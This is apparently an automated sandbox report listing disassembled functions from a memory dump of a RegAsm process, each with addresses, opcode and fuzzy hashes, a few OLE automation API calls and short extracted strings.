Instruction Fuzzy Hash: B1529F70A087889FE735CB24C4847A7BBE1EB91314F14487EC5D616BC2D37DA985878E

Function 00406F00 Relevance: .7, Instructions: 657COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2099588601.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6b06f627f8f7063155f207e74ffce46a74d4b27d2ae33735865de5c38f21a1d3
Instruction ID: 88a4d8245188224da6c9b751cf84f3cedcc9263f93c1a029c290f0b4892f016f
Opcode Fuzzy Hash: 6b06f627f8f7063155f207e74ffce46a74d4b27d2ae33735865de5c38f21a1d3
Instruction Fuzzy Hash: A452C43190C3458FCB15CF14C4906AABBE1FF89314F198A7EE89967391D778E849CB86

Function 00407900 Relevance: .6, Instructions: 592COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2099588601.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 18fa1045b97ec4fdc939129d5411673796127453c2a3e71193d93f43fcda9784
Instruction ID: 8b0ac580ad8a8574a2948a7e2fdf740ac116199dd3d12de69255e2921599d298
Opcode Fuzzy Hash: 18fa1045b97ec4fdc939129d5411673796127453c2a3e71193d93f43fcda9784
Instruction Fuzzy Hash: A0322570A19B118FC328CF29C68052ABBF1BF45310B604A2ED69797F90D73AF845CB59

Function 0040A0C0 Relevance: .4, Instructions: 424COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2099588601.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 60dfa090c44278e5d20a68f1fa3937b32f657ebf4f912e448e8ba26d65979fb0
Instruction ID: 75344489bc0ab57383807ea6085cebb7762d72aa5257d1ff4e7be1646f7b2927
Opcode Fuzzy Hash: 60dfa090c44278e5d20a68f1fa3937b32f657ebf4f912e448e8ba26d65979fb0
Instruction Fuzzy Hash: 14F19B312087419FC724CF29C981A2BBBE2FFA9304F04892DE4D557791E279E954CB9B

Function 0040C9D0 Relevance: .3, Instructions: 348COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2099588601.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a069a071a93173e372eb9129e20244f868db9177c79cfb590b5fda3a74f84e0b
Instruction ID: ecefbda50fc47329cf713b84cd99d92f8c4c1583b38e74876665eb8b92c08c13
Opcode Fuzzy Hash: a069a071a93173e372eb9129e20244f868db9177c79cfb590b5fda3a74f84e0b
Instruction Fuzzy Hash: 8DA10B72F085618BC3218B2CD8C125A76D29BC1760F5A8777D8D9EB3D5E63D8C424BC9

Function 004487D0 Relevance: .3, Instructions: 340COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2099588601.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d0c455671bd025d005b433a51e0469e8370d01ca9758abecacc609c87ea03e06
Instruction ID: ac7e3f3e6e5479c3e065bd175b5e69573bc02051851fa4942dbc11871dacde35
Opcode Fuzzy Hash: d0c455671bd025d005b433a51e0469e8370d01ca9758abecacc609c87ea03e06
Instruction Fuzzy Hash: 80B1BC71A04245DFDB04CFA8D590AAEBBF1EF0A346F15446DE982A7352C734EE10CBA5

Function 00447870 Relevance: .3, Instructions: 338COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2099588601.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0a3813e14db77b2cb9a3450bf8720e81b5ad4722adca260fba7699b3dbb7163d
Instruction ID: b7dd3dd3e325cf7d86234c861d4e01d0f23829e1fbe39d38d7a171eb711173df
Opcode Fuzzy Hash: 0a3813e14db77b2cb9a3450bf8720e81b5ad4722adca260fba7699b3dbb7163d
Instruction Fuzzy Hash: C8B1C372A083504FE714DB29CC8176FB7D5ABC4318F08492EE998D7341EB38ED05879A

Function 0041447C Relevance: .3, Instructions: 324COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2099588601.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4ead3a5117cc22d77092f48ed3b258af8e8bb16c4443d8aad8c1d6722b27ca9
Instruction ID: 98cd01fbc211ca26a9a869fa2a2d8f1f3adceaf59c644c3df58db15ce422b046
Opcode Fuzzy Hash: b4ead3a5117cc22d77092f48ed3b258af8e8bb16c4443d8aad8c1d6722b27ca9
Instruction Fuzzy Hash: 8AB14BB4508341ABD7209B19D880B5FBFF5EFC6399F14482EF58897261E335D884CB56

Function 0040ACC0 Relevance: .3, Instructions: 303COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2099588601.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d70e885100ee8c3020c2e8fccf12862dbe80f03903c8207277d6c2c14b44affc
Instruction ID: f95c4eb077f802b15b38e419b6c9903c98f03582394647806fb540568b8ecc18
Opcode Fuzzy Hash: d70e885100ee8c3020c2e8fccf12862dbe80f03903c8207277d6c2c14b44affc
Instruction Fuzzy Hash: D8C15BB29587418FC360CF28CC967ABB7E1EF85318F08492DD1D9D6342E778A155CB4A

Function 0044A120 Relevance: .3, Instructions: 282COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2099588601.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 79433791699559868bdc0e945731e2f0696389a7b63cbe2b23ccd72ca7b612b1
Instruction ID: 8a2416afe2d281282f79af28e7c17a7bb68b599a179966db40d42b9256853c7f
Opcode Fuzzy Hash: 79433791699559868bdc0e945731e2f0696389a7b63cbe2b23ccd72ca7b612b1
Instruction Fuzzy Hash: A691BD316083429BE715DF28D850A2FB3E5FF89704F09892DE9819B351E779EC60C78A

Function 00449E50 Relevance: .3, Instructions: 270COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2099588601.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e19f8f2b447ff0d1c2a569f4bce7e06867d892fae1498706663e8fd8c7be0b1
Instruction ID: b9b7456e3e898ae08c004736da61932c89a793899f8116ecdeab59140d642e04
Opcode Fuzzy Hash: 3e19f8f2b447ff0d1c2a569f4bce7e06867d892fae1498706663e8fd8c7be0b1
Instruction Fuzzy Hash: AE81AE742083019BE724DF28C890A2BB7E5EF89705F15892DE585CB351E739EC64CB9A

Function 00437B70 Relevance: .2, Instructions: 211COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2099588601.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 74259509137ecbd170bebebc6b90cf9cbd4d3917857fe4a9d87c816acedd5751
Instruction ID: 1a6c7fdaf38ec976c2c369d65c5c2586402de98e218efd40911625752064d79d
Opcode Fuzzy Hash: 74259509137ecbd170bebebc6b90cf9cbd4d3917857fe4a9d87c816acedd5751
Instruction Fuzzy Hash: 7561086664D5814BD338593C4CA13B97A834F9A334F2CA76FE5F28B3D1D95D4802534A

Function 00444590 Relevance: .2, Instructions: 210COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2099588601.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0ca1b8d9a77166c1b677160230efae4332d9d52c123e1580d5caf22b2cf80d5
Instruction ID: 3cae9a0a0be4668727b7c9228231acf60a3d008ecc8f7892d8ba5f887888d518
Opcode Fuzzy Hash: a0ca1b8d9a77166c1b677160230efae4332d9d52c123e1580d5caf22b2cf80d5
Instruction Fuzzy Hash: F961E0706083419BE710EF24D880B2BF7E2EFC6315F14892EE5D587391D739D8528B5A

Function 0043DF50 Relevance: .2, Instructions: 189COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2099588601.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 52b175e41cfd5ab1b094b902e4e44bd05e6eb5a9d545e058933407e74115153e
Instruction ID: 92c67c4e5af2dbbff1c1cee7358f4c69d2d347d391894fccd4dbc5f215fc2c88
Opcode Fuzzy Hash: 52b175e41cfd5ab1b094b902e4e44bd05e6eb5a9d545e058933407e74115153e
Instruction Fuzzy Hash: 7A517EB15083548FE314DF69D89435BBBE1BB88318F044E2EE4E587391E379D9088F86

Function 0040E080 Relevance: .2, Instructions: 188COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2099588601.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 69857838e868ea496fe3d781a8cf842591430edccf156ceb08f937b33f4bfcbd
Instruction ID: ab039a02a80f314ee8e2ea8da21cf5423e65df38b0b33378e975f8c554cc3564
Opcode Fuzzy Hash: 69857838e868ea496fe3d781a8cf842591430edccf156ceb08f937b33f4bfcbd
Instruction Fuzzy Hash: A951253775A59147D328853E4D52266AA870FE3338B3ECB7FE4B19B3E0D17D8812424A

Function 0042CB0F Relevance: .2, Instructions: 184COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2099588601.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bac44cf3505dbcf4aa9a0a94cad5d61f857b3b9226d4ef241e6036a54cf836ea
Instruction ID: b9503aa01e90e9fc89794a2b406f85230356ea0952fa98618da69fe5ca16201b
Opcode Fuzzy Hash: bac44cf3505dbcf4aa9a0a94cad5d61f857b3b9226d4ef241e6036a54cf836ea
Instruction Fuzzy Hash: 5E510D72A14B194BC719CE2DE89163FB6D2ABC4200F89863DDD578B385EF34AC14D785

Function 00408FCE Relevance: .2, Instructions: 184COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2099588601.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 702f50885f32e11826bfd141c7e6d9b53a87974598372aa5a53bc35ead145edc
Instruction ID: 0c096bf0a48a2ece951580887aff841bcef34a043dc188dd79488093ae476539
Opcode Fuzzy Hash: 702f50885f32e11826bfd141c7e6d9b53a87974598372aa5a53bc35ead145edc
Instruction Fuzzy Hash: 3F616679608301CFE708CF29D890B5AB7E1BB89318F08893DE55A87382D739E955CF56

Function 00443460 Relevance: .2, Instructions: 167COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2099588601.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b668032edd1ea6c30fbd6c0aba6a1b590ea9d65feef40b7cdc0df1040a1f0ec5
Instruction ID: 4ca86fcfcbd5e98f9933c92f7d78254957d96a8f55c19efe3dbc893325ad8b40
Opcode Fuzzy Hash: b668032edd1ea6c30fbd6c0aba6a1b590ea9d65feef40b7cdc0df1040a1f0ec5
Instruction Fuzzy Hash: 6A51E430208240ABEB25DF55D940A2FF7E5EF95B0AF14882EE4C587352D739DD11CB6A

Function 00405680 Relevance: .2, Instructions: 167COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2099588601.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e7c923bc061d144724924eee631eaffe2068d6121532fb1150f4d2eba213ac55
Instruction ID: 3f1097353d39c9b448db8e08d4b72fe7c57717c1b2b34319a097bad04f492d00
Opcode Fuzzy Hash: e7c923bc061d144724924eee631eaffe2068d6121532fb1150f4d2eba213ac55
Instruction Fuzzy Hash: C351DF75A04600DFC714AF19C88091BB7A5FF85314F15897EE899AB382D735EC51CF8A

Function 00449700 Relevance: .1, Instructions: 131COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2099588601.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8dfbf597b608cc15cacbee23e73db1ebb21a7d587858155800cb759a7bd94348
Instruction ID: 46b514fad9d4ba0e836b30754f09da1419994bf251a08d8feb48d13db406a25e
Opcode Fuzzy Hash: 8dfbf597b608cc15cacbee23e73db1ebb21a7d587858155800cb759a7bd94348
Instruction Fuzzy Hash: 1D41E074618300AFE714AF19D880B2FBBA5EF86315F24882DF4899B342D339DC10DB5A

Function 00449890 Relevance: .1, Instructions: 128COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2099588601.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d9c0e24556b4ef4febd49ed4adf29d4457dd6e53382b3f6347526e291ff77a51
Instruction ID: 6e052296fd0dcab2690fd0caa101b1b27cd14735985a9a16b53f1f5c13408776
Opcode Fuzzy Hash: d9c0e24556b4ef4febd49ed4adf29d4457dd6e53382b3f6347526e291ff77a51
Instruction Fuzzy Hash: A441BFB4608340AFE7149F19D890B2FF7A5EF86315F24882DE4899B382D335DC10DB5A

Function 00410ED0 Relevance: .1, Instructions: 127COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2099588601.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb018dc5399fef440a0a5bfc226585ef88f1009858cf4be889dd5e2cbe02a3a6
Instruction ID: 913b025f19300ea14e8e7db3c1f92cb7c94e5d626d7874abcda0b3d936cdedf8
Opcode Fuzzy Hash: fb018dc5399fef440a0a5bfc226585ef88f1009858cf4be889dd5e2cbe02a3a6
Instruction Fuzzy Hash: CC415872A0C3540FD358DE3A889422BBBD2AFC5210F08C63EF1E587391E6B4C986D755

Function 00443010 Relevance: .1, Instructions: 110COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2099588601.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 85d9c80b181140885a4e23291525b207c8202a98c8176bc804c0305fb56249e6
Instruction ID: 6b441722810fd5162f18476f3f0a4e624d4020b0db9190d821e3f87b000494af
Opcode Fuzzy Hash: 85d9c80b181140885a4e23291525b207c8202a98c8176bc804c0305fb56249e6
Instruction Fuzzy Hash: 3A313970608340ABE300DF19D984B1FBBE2EB85B19F54C91EE0C88B252C77AC945DB5A

Function 00406B60 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2099588601.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d725d4ba4fd802df6fd221755dba927b50fb6f514e6c667997e14eddbb661b2
Instruction ID: a44188594f51d93899a0d3a3c9f1e0ba89db535253101c4496d7ebf2247cf6cf
Opcode Fuzzy Hash: 5d725d4ba4fd802df6fd221755dba927b50fb6f514e6c667997e14eddbb661b2
Instruction Fuzzy Hash: 7811C43BB2863207E350CE76DCC451B7352EBC6315B0A4539EA82E7386CA36F821D194

Function 0043A3F0 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2099588601.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction ID: a4fd78833d8513809fe3c628109cd5133cd2f1b88e9461769b84b90a1fc31938
Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction Fuzzy Hash: 26112933A451D00EC3128D3C8404565BFA30AF7238F69939AF4F49B2D2D62B8D8B835A

Function 0042F530 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2099588601.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6226d561c1d27d01699578d317e276bd1f24f219ef86e3f1c74ed20e0dd609fe
Instruction ID: cb0eae2fb7acbbfeafe59c0e2916fd7f900f4330164cce7174c8d37270c7c677
Opcode Fuzzy Hash: 6226d561c1d27d01699578d317e276bd1f24f219ef86e3f1c74ed20e0dd609fe
Instruction Fuzzy Hash: D6015EB2B01322A7DA209E55F4C1727B2B86F94B0CF98453EE80457343EB79ED4986D9

Function 004373B7 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2099588601.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e36e52846e7e99f775e09d76f0d208612c87688ff97583b2ae0e4e9e25c56006
Instruction ID: b2e550eaf7414c0d81ebe6c234304ab60717b00b9d94b40c181f57cfb3f5192a
Opcode Fuzzy Hash: e36e52846e7e99f775e09d76f0d208612c87688ff97583b2ae0e4e9e25c56006
Instruction Fuzzy Hash: 2D21A3F0901B00AFD360EF3AC946747BEE8FB49354F004A1EF8AA87691D371A4148BD6

Function 0041A040 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2099588601.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a1b8d582fb4d510ac0465848603293de85f1cbeddc4253f33f89fcd910c8992e
Instruction ID: 8978fa5e65e77a9da2c654727caed3dfa08f5c409a696a9f95d22ff50669cf16
Opcode Fuzzy Hash: a1b8d582fb4d510ac0465848603293de85f1cbeddc4253f33f89fcd910c8992e
Instruction Fuzzy Hash: C4F0A7B1A4421027DB218D959C80BB7BF9CCB8F268F191456E84557202D1755D9083EF

Function 00414C30 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2099588601.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c63062348bac05b3489201115881a8b8b5ef881d48c6822ad6dc8ee5318a706
Instruction ID: 9a53c4e357b4c2264a087e22a8602c94998b4a176c526ad16f9447cb2898ea6a
Opcode Fuzzy Hash: 7c63062348bac05b3489201115881a8b8b5ef881d48c6822ad6dc8ee5318a706
Instruction Fuzzy Hash: 90F062B59083016BD2009A55E894A5FBEF8DBC7394F144C1EF5C493252E33AD890875B

Function 00440D00 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2099588601.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4b5204e339133bf84330416a5308528dd9e98d6cb7a6fcb91640552a86da4e7
Instruction ID: 4b6cc08ffd9d8970d7b809c044d9f62d4b06ae7fb849665ee62dc28a23279fe5
Opcode Fuzzy Hash: a4b5204e339133bf84330416a5308528dd9e98d6cb7a6fcb91640552a86da4e7
Instruction Fuzzy Hash: 20D0A761A0833146BB748E19E400977F7F0EAC7B12F49955FFA82E3248D634EC41C2AD

Function 0043ED40 Relevance: 26.6, APIs: 8, Strings: 7, Instructions: 315memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32 ref: 0043ED9C
SysAllocString.OLEAUT32 ref: 0043EE5C
VariantInit.OLEAUT32(00000000), ref: 0043EEE1
SysStringLen.OLEAUT32(?), ref: 0043EF9B

Strings

&QaS, xrefs: 0043EDE6
n]9_, xrefs: 0043EDEE
`a, xrefs: 0043EE06
3e5g, xrefs: 0043EDFE
{9f;, xrefs: 0043EDB6
h=s?, xrefs: 0043EDAE
dElG, xrefs: 0043EDBE

Memory Dump Source

Source File: 00000003.00000002.2099588601.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Similarity

API ID: String$Alloc$InitVariant
String ID: &QaS$3e5g$`a$dElG$h=s?$n]9_${9f;
API String ID: 3520221836-1152898833
Opcode ID: b7bc189fa02a770cffbd05b039091e2ac4dff470afe79c3d9d598ee5c7fe773e
Instruction ID: 245ce608caa8d0e7e32c98528556309af1013292badbe1e32265ea97ba019c18
Opcode Fuzzy Hash: b7bc189fa02a770cffbd05b039091e2ac4dff470afe79c3d9d598ee5c7fe773e
Instruction Fuzzy Hash: 2CC16575608341AFD3049F29C894A2FBBE2EFCA355F14892EF5858B3A1C739D845CB46

Function 0043461B Relevance: 21.1, APIs: 2, Strings: 10, Instructions: 74COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 00434625
VariantInit.OLEAUT32 ref: 00434638

Strings

-, xrefs: 0043466C
+, xrefs: 0043468A
3, xrefs: 00434662
/, xrefs: 00434676
1, xrefs: 00434658
%, xrefs: 00434694
', xrefs: 0043469E
), xrefs: 00434680
#, xrefs: 004346B2
!, xrefs: 004346A8

Memory Dump Source

Source File: 00000003.00000002.2099588601.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Similarity

API ID: Variant$ClearInit
String ID: !$#$%$'$)$+$-$/$1$3
API String ID: 2610073882-2331977360
Opcode ID: 99523f8bbb05e30d50f7c527ba3f9859542442d6fc68eabb47c10e4df14aebea
Instruction ID: aa229d8ffd08d770e0b442ce0ab2aea3d278b942b7494f66e186f87a6f4e071a
Opcode Fuzzy Hash: 99523f8bbb05e30d50f7c527ba3f9859542442d6fc68eabb47c10e4df14aebea
Instruction Fuzzy Hash: 5941F47010C3C1CED361DB28908879EBFE0AB9A328F481A5DF4E947392C7759545CB57

Function 00435903 Relevance: 21.1, APIs: 2, Strings: 10, Instructions: 67COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 0043590D
VariantInit.OLEAUT32 ref: 00435920

Strings

+, xrefs: 00435972
), xrefs: 00435968
3, xrefs: 0043594A
!, xrefs: 00435990
-, xrefs: 00435954
1, xrefs: 00435940
', xrefs: 00435986
%, xrefs: 0043597C
/, xrefs: 0043595E
#, xrefs: 0043599A

Memory Dump Source

Source File: 00000003.00000002.2099588601.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Similarity

API ID: Variant$ClearInit
String ID: !$#$%$'$)$+$-$/$1$3
API String ID: 2610073882-2331977360
Opcode ID: 2512a766d295c700951f2732db7a39628cb522d6d9a4e055db7e4e3488698b6b
Instruction ID: 3b4e2062160fae6eab703fa3f9d35db381feae730c8683086966fded026d42fd
Opcode Fuzzy Hash: 2512a766d295c700951f2732db7a39628cb522d6d9a4e055db7e4e3488698b6b
Instruction Fuzzy Hash: 8441C47000C3C1DED361DB28948879EBFE06B9A328F445A9DF4E947392C7758545CB97

Function 004353F8 Relevance: 17.6, APIs: 2, Strings: 8, Instructions: 84COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 00435402
VariantInit.OLEAUT32 ref: 00435415

Strings

K, xrefs: 00435488
C, xrefs: 00435448
E, xrefs: 00435458
O, xrefs: 004354A8
I, xrefs: 00435478
M, xrefs: 00435498
G, xrefs: 00435468
A, xrefs: 00435438

Memory Dump Source

Source File: 00000003.00000002.2099588601.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Similarity

API ID: Variant$ClearInit
String ID: A$C$E$G$I$K$M$O
API String ID: 2610073882-1863964857
Opcode ID: 0c16f3b9fbccda87c429147e394ee525b0fa4a12563483afe3bff2e100649278
Instruction ID: 25b6affae47083c67d52bd4909601d4e74bf15511364d10ab50ff0a356e8b788
Opcode Fuzzy Hash: 0c16f3b9fbccda87c429147e394ee525b0fa4a12563483afe3bff2e100649278
Instruction Fuzzy Hash: 7B51B07100CBC1CAD3319B2888487DFBFE0ABA6315F484A9DD5E94B3A2C7794545CBA7

Function 00434CD6 Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 69COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32 ref: 00434CE0

Strings

[, xrefs: 00434D73
Z, xrefs: 00434D6B
W, xrefs: 00434D13
], xrefs: 00434D63
S, xrefs: 00434D33
_, xrefs: 00434D53
Q, xrefs: 00434D43
I, xrefs: 00434D03
U, xrefs: 00434D23

Memory Dump Source

Source File: 00000003.00000002.2099588601.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Similarity

API ID: InitVariant
String ID: I$Q$S$U$W$Z$[$]$_
API String ID: 1927566239-1271914970
Opcode ID: 87118c07b2a6d8f9c7bd25abf49c843bc063277f88a37e2ade06f75478a6da63
Instruction ID: e01ddb18093a994b9e8a4c7fc898ceeb5035d42aac5db9fae9b447c4485569f9
Opcode Fuzzy Hash: 87118c07b2a6d8f9c7bd25abf49c843bc063277f88a37e2ade06f75478a6da63
Instruction Fuzzy Hash: 3B41CF7450C7C18AD3329B3884587DBBBE0ABAA315F440A9DE4ED87382C7B59545CB53

Function 0043420C Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 191COMMON

Download Yara Rule

APIs

SysStringLen.OLEAUT32 ref: 0043421A

Strings

8, xrefs: 004342F8
<, xrefs: 004342F0
%, xrefs: 004342E8
5, xrefs: 00434300
9, xrefs: 00434308

Memory Dump Source

Source File: 00000003.00000002.2099588601.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Similarity

API ID: String
String ID: %$5$8$9$<
API String ID: 2568140703-2114583083
